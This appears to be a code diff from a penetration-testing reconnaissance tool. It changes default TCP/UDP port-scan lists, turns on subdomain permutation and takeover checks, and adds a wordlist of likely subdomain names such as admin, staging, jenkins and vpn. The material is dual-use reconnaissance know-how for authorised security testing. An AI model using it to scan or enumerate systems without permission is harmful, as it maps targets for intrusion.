DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2002,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2780,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3268,3269,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4002,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5001,5009,5038,5040,5051,5060-5061,5093,5104,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6002,6050,6060,6070,6080,6082,6093,6095,6101,6106,6112,6161,6262,6379,6405,6443,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7002,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8009,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8089,8090-8091,8095,8101,8161,8180,8205,8220,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8983,8999-9005,9002,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9876,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10250,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,49180,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:500,U:520,U:2049"
|
||||
DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2002,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2780,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3268,3269,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4002,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5001,5009,5038,5040,5051,5060-5061,5093,5104,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6002,6050,6060,6070,6080,6082,6093,6095,6101,6106,6112,6161,6262,6379,6405,6443,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7002,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8009,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8089,8090-8091,8095,8101,8161,8180,8205,8220,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8983,8999-9005,9002,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9876,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10250,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,49180,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535"
|
||||
DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,500,520,2049"
|
||||
FULL_PORTSCAN_PORTS="T:1-65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:500,U:520,U:2049"
|
||||
|
||||
|
|
@ -162,4 +164,7 @@ SUBOVER="1"
|
|||
PROJECT_SONAR="1"
|
||||
CENSYS_SUBDOMAINS="0"
|
||||
SUBNET_RETRIEVAL="1"
|
||||
SUBJACK="1"
|
||||
SUBJACK="1"
|
||||
ALT_DNS="1"
|
||||
MASS_DNS="1"
|
||||
DNSGEN="1"
|
||||
|
|
@ -0,0 +1,233 @@
|
|||
1
|
||||
10
|
||||
11
|
||||
12
|
||||
13
|
||||
14
|
||||
15
|
||||
16
|
||||
17
|
||||
18
|
||||
19
|
||||
2
|
||||
20
|
||||
2009
|
||||
2010
|
||||
2011
|
||||
2012
|
||||
2013
|
||||
2014
|
||||
2015
|
||||
2016
|
||||
3
|
||||
4
|
||||
5
|
||||
6
|
||||
7
|
||||
8
|
||||
9
|
||||
a
|
||||
acc
|
||||
accept
|
||||
accounts
|
||||
adm
|
||||
admin
|
||||
admin1
|
||||
administrator
|
||||
akali
|
||||
akamai
|
||||
alpha
|
||||
alt
|
||||
america
|
||||
analytics
|
||||
api
|
||||
api1
|
||||
api-docs
|
||||
apollo
|
||||
april
|
||||
aws
|
||||
b
|
||||
backend
|
||||
beta
|
||||
billing
|
||||
boards
|
||||
box
|
||||
brand
|
||||
brasil
|
||||
brazil
|
||||
bucket
|
||||
bucky
|
||||
c
|
||||
cdn
|
||||
cf
|
||||
chef
|
||||
ci
|
||||
client
|
||||
cloudfront
|
||||
cms
|
||||
cms1
|
||||
cn
|
||||
com
|
||||
confluence
|
||||
container
|
||||
control
|
||||
data
|
||||
dec
|
||||
demo
|
||||
dev
|
||||
dev1
|
||||
developer
|
||||
devops
|
||||
docker
|
||||
docs
|
||||
drop
|
||||
edge
|
||||
elasticbeanstalk
|
||||
elb
|
||||
email
|
||||
eng
|
||||
engima
|
||||
engine
|
||||
engineering
|
||||
eu
|
||||
europe
|
||||
europewest
|
||||
euw
|
||||
euwe
|
||||
evelynn
|
||||
events
|
||||
feb
|
||||
fet
|
||||
firewall
|
||||
forms
|
||||
forum
|
||||
frontpage
|
||||
fw
|
||||
games
|
||||
germany
|
||||
gh
|
||||
ghcpi
|
||||
git
|
||||
github
|
||||
global
|
||||
hkg
|
||||
hw
|
||||
hwcdn
|
||||
i
|
||||
ids
|
||||
int
|
||||
internal
|
||||
jenkins
|
||||
jinx
|
||||
july
|
||||
june
|
||||
kor
|
||||
korea
|
||||
kr
|
||||
lan
|
||||
las
|
||||
latin
|
||||
latinamerica
|
||||
lax
|
||||
lax1
|
||||
lb
|
||||
loadbalancer
|
||||
login
|
||||
machine
|
||||
mail
|
||||
march
|
||||
merch
|
||||
mirror
|
||||
na
|
||||
nautilus
|
||||
net
|
||||
netherlands
|
||||
nginx
|
||||
nl
|
||||
node
|
||||
northamerica
|
||||
nov
|
||||
oceania
|
||||
oct
|
||||
ops
|
||||
org
|
||||
origin
|
||||
page
|
||||
pantheon
|
||||
pass
|
||||
pay
|
||||
payment
|
||||
pc
|
||||
php
|
||||
pl
|
||||
poland
|
||||
preferences
|
||||
priv
|
||||
private
|
||||
prd
|
||||
prod
|
||||
production
|
||||
profile
|
||||
profiles
|
||||
promo
|
||||
promotion
|
||||
proxy
|
||||
redirector
|
||||
region
|
||||
repo
|
||||
repository
|
||||
reset
|
||||
restrict
|
||||
restricted
|
||||
reviews
|
||||
s
|
||||
s3
|
||||
sandbox
|
||||
search
|
||||
secure
|
||||
security
|
||||
sept
|
||||
server
|
||||
service
|
||||
singed
|
||||
skins
|
||||
spring
|
||||
ssl
|
||||
staff
|
||||
stage
|
||||
stage1
|
||||
staging
|
||||
static
|
||||
support
|
||||
swagger
|
||||
system
|
||||
t
|
||||
train
|
||||
training
|
||||
team
|
||||
test
|
||||
test1
|
||||
testbed
|
||||
testing
|
||||
testing1
|
||||
tomcat
|
||||
tpe
|
||||
tr
|
||||
trial
|
||||
tur
|
||||
turk
|
||||
turkey
|
||||
twitch
|
||||
uat
|
||||
v1
|
||||
v2
|
||||
vi
|
||||
vpn
|
||||
w3
|
||||
www
|
||||
www3
|
||||
web
|
||||
web1
|
||||
webapp
|
||||
westeurope
|
||||
z
|
||||
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
113957
wordlists/web-brute-full.txt
113957
wordlists/web-brute-full.txt
File diff suppressed because it is too large
Load Diff
Loading…
Reference in New Issue